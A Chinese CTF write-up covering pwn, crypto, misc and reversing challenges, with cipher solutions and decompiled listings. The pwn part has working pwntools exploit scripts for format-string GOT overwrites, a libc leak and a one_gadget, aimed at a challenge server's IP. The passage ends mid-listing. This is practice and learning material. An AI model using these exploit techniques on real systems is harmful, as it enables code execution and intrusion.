好多题都做不出来,老外的出题思路就是不一样。看看有谁有结果。
pwnable
CheckCheckCheck
- 题目
V3Y4GK0FW{EccrEsXpvtjIcdc} 后来改为 V3Y4GK0FW{EccrEs_Xpvtj_Icdc}
思路:显然题目的 flag 头是 T3N4CI0US,对照密文 V3Y4GK0FW 可以看出字母按 +2、+11、+4 循环移位——也就是维吉尼亚密码,key 为 cle(c=2、l=11、e=4),跟后面 crypto 里 "Before Porta arrives at the port!" 那题摩尔斯解出的 key = cle 一致。不过提交总是不正确,后来出题人把题目加了下划线。这题跟 crypto 的 french 是同一道题,也不是 pwn 题。
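def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Decrypt a Vigenère ciphertext with an alphabetic key.

    Each letter is shifted back by the alphabet index of the current key
    letter (a/A = 0, b/B = 1, ...). The key position advances only on
    ASCII letters, so digits, braces and underscores are copied through
    unchanged and do not consume a key letter. The case of every
    ciphertext letter is preserved.

    The original one-off script hard-coded the shifts 2, 11, 4 and only
    worked on a 21-letter input with the non-letters stripped by hand;
    those shifts are exactly the key "cle".

    Args:
        ciphertext: text to decrypt; non-letters pass through verbatim.
        key: non-empty ASCII-alphabetic key, e.g. "cle".

    Returns:
        The plaintext, same length as ``ciphertext``.

    Raises:
        ValueError: if ``key`` is empty or contains a non-ASCII-letter.
    """
    if not key or not (key.isascii() and key.isalpha()):
        raise ValueError("key must be a non-empty ASCII alphabetic string")
    shifts = [ord(k) - ord("a") for k in key.lower()]
    out = []
    pos = 0  # index into shifts; advances only when a letter is consumed
    for ch in ciphertext:
        if "A" <= ch <= "Z":
            base = ord("A")
        elif "a" <= ch <= "z":
            base = ord("a")
        else:
            out.append(ch)
            continue
        out.append(chr((ord(ch) - base - shifts[pos % len(shifts)]) % 26 + base))
        pos += 1
    return "".join(out)


if __name__ == "__main__":
    c = 'VYGKFWEccrEsXpvtjIcdc'
    print(c)
    print(vigenere_decrypt(c.upper(), 'cle'))   # all upper-case, as the old 'out'
    print(vigenere_decrypt(c, 'cle'))           # case restored, as the old 'b'
    # The full flag string can now be fed in directly, digits and all.
    print(vigenere_decrypt('V3Y4GK0FW{EccrEs_Xpvtj_Icdc}', 'cle'))
#T3N4CI0US{CrypToVerryEasy}
#T3N4CI0US{CrypTo_Verry_Easy}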
- 题目
prison
- 题目原码
// prison: decompiled main (IDA pseudo-C, not meant to compile as-is).
// Classic stack overflow: `s` is a 10-byte buffer at rbp-0xA and gets()
// has no length limit, so 10 bytes of s + 8 bytes of saved rbp = 18 bytes
// of input reach the saved return address. No stack canary is visible in
// this listing. The two-argument gets(s, argv) is decompiler noise; the
// real call takes only the buffer.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[10]; // [rsp+6h] [rbp-Ah] BYREF

  puts("It's up to you when you come in, but not when you go out");
  gets(s, argv);  // unbounded read into a 10-byte buffer
  puts(s);        // echoes the input; if the remote's stdout is not a tty this may stay buffered
  return 0;
}
显然这是个栈溢出的题:s 只有 10 字节(rbp-0xA),gets 没有长度限制,所以写满 10+8=18 字节就覆盖到返回地址。正常情况下先溢出后写 pop_rdi、got_puts、plt_puts、_start 取得 libc,再来一次 pop_rdi、bin_sh、system 就行了。可这里有个问题:输入后没有任何回显(远程的 stdout 不是 tty,可能是全缓冲,puts 的输出要等缓冲区满或进程正常退出才会出来),为得到回显做了无数次尝试,最后发现后边需要两个回车 \n\n 或者很近的两个回车 \nabcd\n,而到第二次循环就直接 over 了。后来题目显示有问题。
- 题目原码
Patchcode
- 其实这里没有题目,nc 过去以后直接就是一个 shell,可以直接 cat home/ctf/flag(估计是题目环境配错了,把带 shell 的容器直接暴露出来了)。提交也显示正确并且不能再提交,但不显示分数。
noooooob
- 这是个 ret2system 的题:read(0, buf, 0x100) 之后直接 printf(buf),是标准的格式化字符串漏洞;程序里有 system 函数,GOT 表可写(没有 Full RELRO),PIE 没开,所以地址全是固定的。main 最后通过 exit(0) 退出,exit 的 GOT 项就是改写目标。
// noooooob: decompiled main. Format-string bug: up to 0x100 bytes of user
// input are handed to printf() as the format itself. buf sits at rsp+0,
// so the first 8 bytes of input are printf's 6th argument (%6$...), the
// next 8 are %7$..., and so on. The stack canary (__readfsqword(0x28)) is
// irrelevant here: nothing overflows. The program leaves through exit(0),
// i.e. through a GOT entry that, per the write-up, is writable (no PIE),
// which is what the %n write retargets.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+108h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  read(0, buf, 0x100uLL);  // 256 bytes into a 264-byte buffer: no overflow, but read() adds no NUL
  printf(buf);             // user-controlled format string
  exit(0);                 // resolved via GOT -> the overwrite target
}
解法也简单,直接把 got['exit'] 改成调 system 的那段代码的地址。payload 里 %64c%10$hn 先往 got_exit+2 写 0x0040,接着 %1415c%9$hn 用累计字符数 64+1415=1479=0x5C7 往 got_exit 写,合起来 got_exit = 0x004005C7(这个地址应该就是程序里调 system 的那段,可对照 IDA 确认)。格式串正好 24 字节,buf 从 rsp+0 开始对应 printf 的第 6 个参数,所以后面两个 p64 正好落在第 9、10 个参数。
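from pwn import *
import struct

# With buf at rsp+0 the first 8 input bytes are printf's 6th argument, so a
# 24-byte format string puts the two pointers that follow at args 9 and 10.
FMT_LEN = 24


def build_exit_hijack(got_exit: int, target: int = 0x4005C7) -> bytes:
    """Build the format-string payload that rewrites exit@GOT to ``target``.

    Two %hn writes are used, high half first: ``hi`` characters are printed
    and the count stored through arg 10 (got_exit+2), then
    ``(lo - hi) mod 0x10000`` more are printed so the running count equals
    ``lo`` when it is stored through arg 9 (got_exit). The original
    hand-written payload ``%64c%10$hn%1415c%9$hnxxx`` is exactly this for
    target 0x4005C7 (0x40 = 64, 0x5C7 = 64 + 1415); the magic numbers are
    now derived instead of typed in.

    Args:
        got_exit: address of the exit() GOT entry (elf.got['exit']).
        target: address exit() should jump to instead. 0x4005C7 is the
            value the original payload wrote; what lives there (presumably
            the call to system) must be checked against the binary.

    Returns:
        The 24-byte format string followed by two little-endian 8-byte
        pointers (got_exit, got_exit + 2).

    Raises:
        ValueError: if the high half is 0 (``%0c`` still prints one
            character, so a zero count cannot be expressed this way) or the
            format does not fit in the 24-byte slot.
    """
    hi = (target >> 16) & 0xFFFF
    lo = target & 0xFFFF
    if hi == 0:
        raise ValueError("high 16 bits must be nonzero for a %c-padded write")
    delta = (lo - hi) % 0x10000
    fmt = f"%{hi}c%10$hn" + (f"%{delta}c%9$hn" if delta else "%9$hn")
    fmt_bytes = fmt.encode()
    if len(fmt_bytes) > FMT_LEN:
        raise ValueError("format string does not fit in the 24-byte slot")
    fmt_bytes = fmt_bytes.ljust(FMT_LEN, b"x")
    return fmt_bytes + struct.pack("<Q", got_exit) + struct.pack("<Q", got_exit + 2)


if __name__ == "__main__":
    #p = process('./prob')
    p = remote('34.64.203.138', 10002)
    elf = ELF('./prob')
    context(arch='amd64', log_level='debug')
    #gdb.attach(p, "b*0x400630")
    #pause()
    payload = build_exit_hijack(elf.got['exit'])
    # pwntools alternative that was also tried:
    #payload = fmtstr_payload(7, {elf.got['exit'] : elf.sym['system']+4})
    p.sendline(payload)
    # The remote does not flush its output promptly; give it a moment.
    sleep(1)
    p.interactive()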
- 这是个 ret2system 的题:read(0, buf, 0x100) 之后直接 printf(buf),是标准的格式化字符串漏洞;程序里有 system 函数,GOT 表可写(没有 Full RELRO),PIE 没开,所以地址全是固定的。main 最后通过 exit(0) 退出,exit 的 GOT 项就是改写目标。
Trigger Master
- 这个跟上题一样,只是没有了system函数
// Trigger Master: decompiled main, byte-for-byte the same shape as noooooob
// (read -> printf(buf) -> exit). Per the write-up this binary has no
// system() of its own, so the format-string bug has to be used twice: once
// to turn exit@GOT into main (so the program loops) and leak a libc
// address from the GOT, then once more to point printf@GOT at system or a
// one_gadget. buf is at rsp+0, so input byte 0 is printf argument 6.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf[264]; // [rsp+0h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+108h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  read(0, buf, 0x100uLL);  // no overflow (0x100 < 264); read() does not NUL-terminate
  printf(buf);             // user-controlled format string: arbitrary read (%s) and write (%n)
  exit(0);                 // via GOT: the first overwrite target
}
思路是先把 got_exit 改为 main 让程序循环,同时泄露 got[printf] 里的 libc 地址,算出 libc 基址后再把 printf 的 GOT 改成 system(或 one_gadget),再发个 /bin/sh 让 printf(buf) 变成 system("/bin/sh")。但问题与上边一样没有输出,需要很大的输出(%4000c 之类)才能把缓冲区挤出一部分来,最终也没有打通,后来几乎所有的 pwn 题都报后台有问题就算了。
from pwn import *


def conn(local: int = 1) -> None:
    """Open the target and pick the libc / one_gadget offsets.

    Sets the globals ``p`` (tube), ``libc_elf`` (the same local libc 2.31
    copy is used for both modes, so the remote must run that exact build)
    and ``one`` (one_gadget offsets for that libc).
    """
    global p,libc_elf,one
    if local == 1:
        p = process('./prob')
        libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6')
        one = [0xe3afe, 0xe3b01, 0xe3b04]
    else:
        p = remote('34.64.203.138', 10003)
        libc_elf = ELF('/home/shi/libc6_2.31-0ubuntu9.9/lib/x86_64-linux-gnu/libc.so.6')
        one = [0xe3afe, 0xe3b01, 0xe3b04]


def write(where: int, what: int) -> None:
    """Write ``what`` into memory at ``where`` one byte at a time via %hhn.

    The payload starts with '/bin/sh;' (8 chars already printed, hence
    v0 = 8) so that once printf@GOT points at system the same input also
    works as the command string. Byte i of ``what`` is written through
    printf argument 16+i: the format part is padded to 0x50 bytes, i.e.
    10 qwords, and buf starts at arg 6, so the 8 pointers appended after
    it sit at args 16..23. Each %c width is the difference to the
    previously written byte value modulo 256 (the %hhn counter only
    grows). The loop stops once the remaining value is 0, so only the low
    bytes are rewritten and the higher bytes of the target keep their old
    contents. The trailing %4000c forces enough output to push the
    remote's buffered stdout out; 'XXXX' is the sync marker the caller
    waits for.

    Caveat: ljust(0x50) only works while the format part fits in 80 bytes;
    six bytes of up to "%255c%NN$hhn" each plus the prefix can exceed that,
    in which case the pointers shift and the arg indices are off.
    """
    print(hex(where), hex(what))
    v0 = 8
    off = 16
    payload = '/bin/sh;'
    for i in range(8):
        v1 =what&0xff
        what >>=8
        v2 = (v1-v0)%0x100
        v0 = v1
        if v2 == 0:
            payload += "%"+ str(off+i)+"$hhn"
        else:
            payload += "%"+ str(v2) + "c%"+ str(off+i)+"$hhn"
        if what == 0:
            break
    payload = (payload+ '%4000c').ljust(0x50, 'A').encode()
    for i in range(8):
        payload += p64(where+i)
    #payload = payload.ljust(0x100, b'A')
    p.sendline(payload+ b'XXXX')


elf = ELF('./prob')
context(arch='amd64', log_level='debug')
#0x400577
conn(0)
p.settimeout(5.0)
#gdb.attach(p, 'b*0x4005c8')
#pause()
off = 6 + (0x7a8-0x5f0)//8  # unused; leftover from the earlier attempt commented out below
#sleep(2)
#payload = b"%5c%11$hhn%114c%10$hhn%12$s,".ljust(0x20,b'A')+flat(elf.got['exit'],elf.got['exit']+1, elf.got['printf'])
#p.sendline( payload)
# Step 1: exit@GOT -> main, so printf(buf) can be reached again.
write(elf.got['exit'], elf.sym['main'])
#sleep(2)
sleep(5)
p.recvuntil(b'XXXX')
# Step 2: leak printf@GOT. '%8$s' reads the pointer at arg 8 = buf+16, which
# is where the p64 lands after the 16-byte format prefix.
p.sendline((b'%8$s%5000c'.ljust(16, b'A')+p64(elf.got['printf'])))
sleep(5)
# Take the last 6 bytes up to the 0x7f of a userland libc address.
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['printf']
libc_elf.address = libc_base
print('libc:',hex(libc_base))
system = libc_elf.sym['system']  # computed but unused: the one_gadget is written instead
# Step 3: printf@GOT -> one_gadget; the next printf(buf) call runs it.
write(elf.got['printf'], libc_base + one[2])
sleep(5)
p.recv()
p.sendline(b'/bin/sh\x00')
p.interactive()
- 这个跟上题一样,只是没有了system函数
MISC
find me
- misc 题一个都没做出来,没有附件,只有提示,感觉像脑筋急转弯。
hello pls find Dolpari flag format : T3N4CI0US{Site URL}
- misc 题一个都没做出来,没有附件,只有提示,感觉像脑筋急转弯。
Find us
Hi, can you find us? Go into a site somewhere and look for us!
Basic Number
I'm going to code the file I gave you, and I'm going to code the number seven Enter the code with the print as flag format : T3N4CI0US{print????????}
Hard Number
Complete this code so that the number 7 comes out Then insert the last line of the code into the flag #这个有附件,是 ipynb(Jupyter notebook)文件,没看懂
re They
- 有一堆图,提示是
About them!
- 有一堆图,提示是
Crypto
french
- 跟pwn那是一个题
French Ciper V3Y4GK0FW{EccrEs_Xpvtj_Icdc}
- 跟pwn那是一个题
Before Porta arrives at the port!
- 摩尔斯码,解出来的 key = cle 应该是给上一题的:French Cipher 应该就是维吉尼亚密码,上题用 cle 做 key 确实能解出 T3N4CI0US{CrypTo_Verry_Easy}。题名里的 Porta 则是在提示 Porta 密码(另一种多表替换密码),见下面。
Before Porta arrives at the port! Decryption is required to interpret this.. ...-- -. ....- -.-. .. ----- ..- ... # --- .--- .- -.. .-.. -.. ..--.- ..- ..--.- .--. -.-- .--. ..--.- ...- ..--.- . ..-. --. --.. -..- --.. -..- # key = cle
解出来不对。第一段摩尔斯 ...-- -. ....- -.-. .. ----- ..- ... 是 3N4CI0US(flag 头),第二段译出来是 OJADLD_U_PYP_V_EFGZXZX。题名 "Before Porta arrives at the port" 是在提示 Porta 密码而不是维吉尼亚:用 Porta 密码配 key=cle 去解第二段(key 只在字母上推进,下划线原样保留;密钥字母两两一组 AB=0、CD=1、EF=2…,所以 c→1、l→5、e→2;密文在 A–M 时明文 = 13+((c−n) mod 13),密文在 N–Z 时明文 = (c−13+n) mod 13),得到的是有意义的明文 CRYPTO_I_HAD_A_PROBLEM,所以答案应该是 T3N4CI0US{CRYPTO_I_HAD_A_PROBLEM}。下面两个结果分别是直接取摩尔斯译文、以及按维吉尼亚用 cle 解的,都不对:
T3N4CI0US{OJADLD_U_PYP_V_EFGZXZX} T3N4CI0US{MYWBAZ_S_EUN_K_ADVVVOT}
- 摩尔斯码,解出来的 key = cle 应该是给上一题的:French Cipher 应该就是维吉尼亚密码,上题用 cle 做 key 确实能解出 T3N4CI0US{CrypTo_Verry_Easy}。题名里的 Porta 则是在提示 Porta 密码(另一种多表替换密码),见上面。
ed
What is this? HcBBCkAREAbgq/xuoFjZWtnY4AAyQ0oplnp3n3pfX3VgXjhkE60PuqRH3DbxUb9PAA==
re
Find the alphabet and number to fit in (). ╭──────────╮ I H M () L A T P ╰──────────╯ I = 7 H = 6 M = 7 () = () L = 15 A = 15 T = 38 P = 16 T3N4CI0US{Alphabet_Number}
ro
[ W E = 360 ] [ S N S = 360 ] [ N E W S = ? ]
这个题的 E、W、S、N 表示东西南北,按从北开始顺时针的方位角 N=0、E=90、S=180、W=270:W+E=270+90=360,S+N+S=180+0+180=360,所以 NEWS=0+90+270+180=540。
Shuuuung
Can you find this password and escape? Find the password that means these. JEW LEE ETT, CHAR LEE, PAH PAH Replace spaces with _
one
26s + 8t = 2( == gcd(26,8)) + 12345 for the correct answer
Reversing
Warmup
- 这个程序肯定是看不懂的,非常非常复杂,但源码里直接能找到 flag。
T3N4CI0US{773a_6d8c_c01fbc_f454646564_2_049eb4_3c2ad_852}
- 这个程序肯定是看不懂的,非常非常复杂,但源码里直接能找到 flag。
Rooftop
- 先 MD5、再把 16 字节摘要逆序、再 hex,看似简单,但 MD5 这块逆不了。不过并不需要真的逆 MD5:把目标串 55347092ad1b19f9021174038078e57a 按字节逆序回去就是密码真正的 MD5 值 7ae5788003741102f9191bad92703455(前提是 esrever 是对 16 字节整体逆序),拿它去查字典/在线 MD5 库即可;比较之前的 printf("%s", s2) 还会把算出来的值打印出来,可以本地验证候选密码。
// Rooftop: decompiled main. argv[1] is run through emmdee5() (MD5, then the
// 16 digest bytes reversed, then hex-encoded) and compared with a fixed
// 32-char hex string. MD5 is not invertible, but nothing here needs it:
// undo the reversal on the target (read its 16 bytes back to front) to get
// the password's real MD5, then look that up in a wordlist / hash database.
// The printf("%s", s2) before the compare prints the computed value, which
// is handy for checking a candidate locally.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s2[8]; // [rsp+10h] [rbp-30h] BYREF
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]
  __int64 v7; // [rsp+28h] [rbp-18h]
  char v8; // [rsp+30h] [rbp-10h]

  if ( argc > 1 )
  {
    // s2, v5, v6, v7, v8 are one contiguous 33-byte buffer (32 hex chars +
    // NUL) that the decompiler split into separate locals; zeroing them
    // all is the initialisation.
    *(_QWORD *)s2 = 0LL;
    v5 = 0LL;
    v6 = 0LL;
    v7 = 0LL;
    v8 = 0;
    emmdee5(argv[1], (__int64)s2);
    printf("%s", s2);
    if ( !strcmp("55347092ad1b19f9021174038078e57a", s2) )
      printf("Flag: T3N4CI0US{%s}\n", argv[1]);
    else
      puts("Sorry..");
    return 0;
  }
  else
  {
    printf("Flag: %s <password>\n", *argv);
    return 1;
  }
}

// MD5 -> reverse -> hex. `a2` must point at >= 33 bytes: the loop writes
// 16 two-char pairs plus sprintf's terminating NUL.
int __fastcall emmdee5(const char *a1, __int64 a2)
{
  __int64 v2; // rax
  int result; // eax
  __int64 v4[3]; // [rsp+10h] [rbp-20h] BYREF
  int i; // [rsp+2Ch] [rbp-4h]

  v4[0] = 0LL;
  v4[1] = 0LL;
  v2 = strlen(a1);
  MD5((__int64)a1, v2, (__int64)v4);  // 16-byte digest into v4
  // "esrever" is "reverse" backwards; presumably reverses the digest in
  // place, since the loop below reads v4 again. NOTE(review): it takes a
  // const char *, so if it is strlen-based a digest containing a 0x00 byte
  // would only be partially reversed -- confirm in the binary.
  result = esrever((const char *)v4); // reverse
  for ( i = 0; i <= 15; ++i )
    result = sprintf((char *)(a2 + 2 * i), "%02x", *((unsigned __int8 *)v4 + i));
  return result;
}
- 先 MD5、再把 16 字节摘要逆序、再 hex,看似简单,但 MD5 这块逆不了。不过并不需要真的逆 MD5:把目标串 55347092ad1b19f9021174038078e57a 按字节逆序回去就是密码真正的 MD5 值 7ae5788003741102f9191bad92703455(前提是 esrever 是对 16 字节整体逆序),拿它去查字典/在线 MD5 库即可;比较之前的 printf("%s", s2) 还会把算出来的值打印出来,可以本地验证候选密码。
WHISEN
- 把flag的字符重新排了个序
// WHISEN: decompiled main. v6 holds the flag body with its characters
// shuffled; s1 is rebuilt by a fixed permutation (the 25 s1[i] = v6[k]
// assignments below) and compared with the user's input. Reading the
// permutation off the listing is the whole challenge.
//
// Observations from the assignments:
//   - only s1[0..24] are set; s1[25] is never written, yet strncmp compares
//     0x1A = 26 bytes, so the in-program check also depends on whatever
//     byte happens to be on the stack at s1[25] (it passes only if that
//     byte is 0, matching the input's terminator).
//   - v6[0] ('}') and v6[1] are never used and v6[14] is used twice (s1[3]
//     and s1[20]); the closing brace therefore has to be added by hand.
//   - scanf("%s") into a 0x1A-byte heap buffer has no width limit (heap
//     overflow); irrelevant for the flag but worth noting.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1[40]; // [rsp+0h] [rbp-50h] BYREF
  char *s2; // [rsp+28h] [rbp-28h]
  char v6[26]; // [rsp+36h] [rbp-1Ah] BYREF

  qmemcpy(v6, "}40_0hIfUrC{S_4rrc0NT03k3T", sizeof(v6));
  s2 = (char *)malloc(0x1AuLL);
  printf("Enter the Password : ");
  __isoc99_scanf("%s", s2);
  s1[0] = v6[25];
  s1[1] = v6[22];
  s1[2] = v6[19];
  s1[3] = v6[14];
  s1[4] = v6[10];
  s1[5] = v6[6];
  s1[6] = v6[4];
  s1[7] = v6[8];
  s1[8] = v6[12];
  s1[9] = v6[11];
  s1[10] = v6[16];
  s1[11] = v6[18];
  s1[12] = v6[21];
  s1[13] = v6[20];
  s1[14] = v6[3];
  s1[15] = v6[7];
  s1[16] = v6[2];
  s1[17] = v6[15];
  s1[18] = v6[13];
  s1[19] = v6[5];
  s1[20] = v6[14];
  s1[21] = v6[17];
  s1[22] = v6[23];
  s1[23] = v6[24];
  s1[24] = v6[9];
  if ( !strncmp(s1, s2, 0x1AuLL) )
    printf("Success! You found the flag!\n%s\n", s1);
  else
    puts("Incorrect Password !");
  return 0;
}
结果这个提交正确了。注意程序里 s1 只拼了 25 个字符,v6[0] 的 '}' 从未被用到(v6[14] 反而用了两次),所以结尾的 '}' 是手工补上的。
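# Position i of the rebuilt string takes character ORDER[i] of the scrambled
# constant, exactly as the binary's s1[i] = v6[ORDER[i]] assignments.
# Note v6[0] ('}') and v6[1] are never used and v6[14] appears twice
# (s1[3] and s1[20]), so the closing brace has to be added by hand.
ORDER = (25, 22, 19, 14, 10, 6, 4, 8, 12, 11, 16, 18, 21,
         20, 3, 7, 2, 15, 13, 5, 14, 17, 23, 24, 9)


def unscramble(v6: str, order: tuple[int, ...] = ORDER) -> str:
    """Rebuild the flag body from the scrambled constant.

    Replaces the 25 hand-copied ``s1[i] = v6[k]`` lines with one table so
    the permutation can be checked against the listing in one glance.

    Args:
        v6: the scrambled string from the binary (26 chars).
        order: index into ``v6`` for each output position.

    Returns:
        ``"".join(v6[k] for k in order)``.

    Raises:
        IndexError: if ``order`` indexes past the end of ``v6``.
    """
    return "".join(v6[k] for k in order)


if __name__ == "__main__":
    v6 = "}40_0hIfUrC{S_4rrc0NT03k3T"
    s1 = list(unscramble(v6))
    print(s1)
    print(''.join(s1))
#T3N4CI0US{r00T_f0r_h4ck3r}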
- 把flag的字符重新排了个序
TLS
- 我感觉这是唯一有点难度的题:32 位,UPX 壳,脱壳后 z3 一把梭,但提交不正确,不知道哪错了(原因见后面)。
fgets(Buffer, 256, Stream); v6 = ftell(Stream); fclose(Stream); if ( v6 == 19 ) { v8[0] = (Buffer[11] * Buffer[11] - Buffer[11]) ^ (Buffer[0] + Buffer[18] * Buffer[12] * Buffer[17] + Buffer[5] + Buffer[0] * Buffer[16] - Buffer[14] * Buffer[1]) ^ 0x59; v8[1] = (Buffer[1] + Buffer[7] * Buffer[0] - Buffer[18] * Buffer[0] - Buffer[5]) ^ (Buffer[12] + Buffer[4] * Buffer[2]) ^ (Buffer[1] - Buffer[10] * Buffer[3]) ^ 0x7B; v8[2] = Buffer[11] ^ Buffer[8] ^ (Buffer[1] * Buffer[15] + Buffer[3] * Buffer[17] - Buffer[14] - Buffer[5] - Buffer[1] - Buffer[6]) ^ Buffer[3] ^ 0xC0; v8[3] = Buffer[9] ^ Buffer[5] ^ (Buffer[8] + Buffer[3] + Buffer[4] + Buffer[18] - Buffer[4] * Buffer[6]) ^ Buffer[15] ^ 0xAD; v8[4] = Buffer[12] ^ (Buffer[18] * Buffer[18] * Buffer[4] - Buffer[7] - Buffer[3]) ^ (Buffer[3] - Buffer[17] - Buffer[1]) ^ (Buffer[5] + Buffer[7] * Buffer[18]) ^ 0x55; v8[5] = (Buffer[10] + Buffer[3] * Buffer[14] - Buffer[15]) ^ (Buffer[8] + Buffer[14] - Buffer[11]) ^ Buffer[3] ^ 0x9C; v8[6] = Buffer[6] ^ Buffer[3] ^ Buffer[9] ^ (Buffer[2] * Buffer[5] * Buffer[17] + Buffer[11] + Buffer[17] - Buffer[15] - Buffer[5] - Buffer[7]) ^ 0x12; v8[7] = (Buffer[8] * Buffer[9] * Buffer[17]) ^ (Buffer[5] * Buffer[2] * Buffer[16] - Buffer[5] - Buffer[7]) ^ Buffer[16] ^ 0x34; v8[8] = Buffer[4] ^ Buffer[7] ^ Buffer[6] ^ (Buffer[16] * Buffer[4] - Buffer[7] * Buffer[15]) ^ (Buffer[1] * Buffer[10] * Buffer[1] * Buffer[17]) ^ Buffer[10] ^ 0x53; v8[9] = (Buffer[12] * Buffer[3]) ^ (Buffer[5] * Buffer[9] + Buffer[13] + Buffer[2] + Buffer[15] * Buffer[9] - Buffer[1] - Buffer[14] * Buffer[3]) ^ 0x50; v8[10] = (Buffer[5] * Buffer[7]) ^ Buffer[11] ^ (Buffer[12] - Buffer[15]) ^ (Buffer[0] + Buffer[9]) ^ (Buffer[7] - Buffer[1] * Buffer[3]) ^ 0x13; v8[11] = (Buffer[10] + Buffer[2] * Buffer[17]) ^ (Buffer[16] + Buffer[15] * Buffer[6] + Buffer[11] + Buffer[9] - Buffer[4]) ^ Buffer[5] ^ 0x62; v8[12] = (Buffer[6] + Buffer[7] - Buffer[5] - Buffer[9] - Buffer[5] * Buffer[12]) ^ Buffer[16] ^ (Buffer[8] * Buffer[14]) 
^ 0x9B; v8[13] = Buffer[0] ^ (Buffer[16] + Buffer[9] + Buffer[5] * Buffer[17] - Buffer[0]) ^ (Buffer[18] + Buffer[6] + Buffer[16]) ^ 0x85; v8[14] = Buffer[3] ^ (Buffer[11] + Buffer[6]) ^ (Buffer[2] * Buffer[14] * Buffer[0]) ^ Buffer[7] ^ (Buffer[15] - Buffer[2]) ^ 0x73; v8[15] = (Buffer[2] * Buffer[18] + Buffer[10]) ^ (Buffer[5] + Buffer[14] * Buffer[16] - Buffer[8] - Buffer[6] - Buffer[17]) ^ (Buffer[0] * Buffer[7] + Buffer[9]) ^ 0x3D; v8[16] = (Buffer[14] + Buffer[7] - Buffer[8] - Buffer[6] - Buffer[8]) ^ Buffer[2] ^ Buffer[16] ^ 0xD0; v8[17] = (Buffer[0] * Buffer[17] * Buffer[3] * Buffer[2]) ^ (Buffer[13] - Buffer[8] - Buffer[10] * Buffer[5]) ^ (Buffer[12] + Buffer[0]) ^ (Buffer[11] + Buffer[10]) ^ 0xF2; v8[18] = (Buffer[5] * Buffer[15] * Buffer[8] + Buffer[7] * Buffer[8] + Buffer[15] - Buffer[1] - Buffer[12]) ^ 0x92; v8[19] = (Buffer[6] * Buffer[0]) ^ (Buffer[12] * Buffer[14] + Buffer[11] + Buffer[1] - Buffer[9] * Buffer[16] - Buffer[18] - Buffer[9]) ^ 0x43; v8[20] = (Buffer[0] + Buffer[11]) ^ (Buffer[17] + Buffer[8] * Buffer[3] - Buffer[7]) ^ (Buffer[7] + Buffer[7] * Buffer[16] + Buffer[0] - Buffer[10]) ^ 0x18; v8[21] = Buffer[9] ^ (Buffer[9] + Buffer[8] * Buffer[9] - Buffer[17]) ^ (Buffer[2] * Buffer[4] * Buffer[1] * Buffer[15] * Buffer[17] * Buffer[5]) ^ 0x26; v8[22] = Buffer[8] ^ (Buffer[5] * Buffer[15] - Buffer[11] * Buffer[17] * Buffer[2]) ^ Buffer[18] ^ 0x9B; v8[23] = (Buffer[1] * Buffer[17] * Buffer[4]) ^ (Buffer[5] + Buffer[11] * Buffer[11]) ^ (Buffer[2] - Buffer[7]) ^ (Buffer[14] * Buffer[9]) ^ Buffer[11] ^ 0x38; v8[24] = (Buffer[4] * Buffer[11] * Buffer[12] - Buffer[1]) ^ (Buffer[14] * Buffer[5]) ^ Buffer[14] ^ Buffer[12] ^ 0x7F; v8[25] = Buffer[10] ^ (Buffer[10] - Buffer[16]) ^ (Buffer[9] * Buffer[15]) ^ 0x40; v8[26] = (Buffer[12] * Buffer[8]) ^ (Buffer[13] * Buffer[13]) ^ (Buffer[2] * Buffer[1] - Buffer[11]) ^ (Buffer[3] + Buffer[10]) ^ 0x12; v8[27] = (Buffer[6] * Buffer[14]) ^ Buffer[17] ^ (Buffer[18] * Buffer[2] + Buffer[4]) ^ 0x7E; v8[28] = 
(Buffer[10] + Buffer[16]) ^ (Buffer[8] * Buffer[11] + Buffer[15]) ^ Buffer[13] ^ (Buffer[4] * Buffer[15] - Buffer[8]) ^ 0x7F; v8[29] = (Buffer[1] + Buffer[10]) ^ (Buffer[6] + Buffer[6] + Buffer[4] + Buffer[0] + Buffer[12] + Buffer[7] * Buffer[5] - Buffer[2]) ^ 0xDF; v8[30] = (Buffer[9] * Buffer[0] * Buffer[5] * Buffer[1] - Buffer[1]) ^ Buffer[14] ^ (Buffer[9] + Buffer[6] - Buffer[4]) ^ 0xF4; v8[31] = (Buffer[5] * Buffer[0] * Buffer[4] + Buffer[7]) ^ (Buffer[5] * Buffer[6] * Buffer[7]) ^ Buffer[11] ^ Buffer[9] ^ 0x53; v8[32] = (Buffer[12] - Buffer[9]) ^ (Buffer[10] - Buffer[1]) ^ Buffer[2] ^ 0x50; v8[33] = (Buffer[8] - Buffer[10]) ^ (Buffer[7] + Buffer[3] - Buffer[0]) ^ (Buffer[13] * Buffer[0] * Buffer[18] - Buffer[15]) ^ 0xE3; v8[34] = (Buffer[3] + Buffer[1] - Buffer[15] - Buffer[2] - Buffer[0]) ^ (Buffer[5] - Buffer[4]) ^ Buffer[10] ^ 0xCF; v8[35] = (Buffer[10] * Buffer[8] * Buffer[6] * Buffer[11] * Buffer[11] * Buffer[1]) ^ (Buffer[13] * Buffer[18] + Buffer[5]) ^ 0x98; Text[0] = v8[rand() % 2]; Text[2] = v8[rand() % 2 + 4]; Text[3] = v8[rand() % 2 + 6]; LOBYTE(v15) = v8[rand() % 2 + 16]; BYTE1(v14) = v8[11 - rand() % 2]; HIBYTE(v14) = v8[rand() % 2 + 14]; LOBYTE(v14) = v8[rand() % 2 + 8]; BYTE2(v14) = v8[13 - rand() % 2]; Text[1] = v8[3 - rand() % 2]; HIBYTE(v15) = 0; Caption[0] = v8[rand() % 2 + 18]; Caption[1] = v8[rand() % 2 + 20]; Caption[2] = v8[rand() % 2 + 22]; Caption[3] = v8[rand() % 2 + 24]; LOBYTE(v11) = v8[rand() % 2 + 26]; BYTE1(v11) = v8[rand() % 2 + 28]; BYTE2(v11) = 79; HIBYTE(v11) = v8[rand() % 2 + 32]; v12 = (unsigned 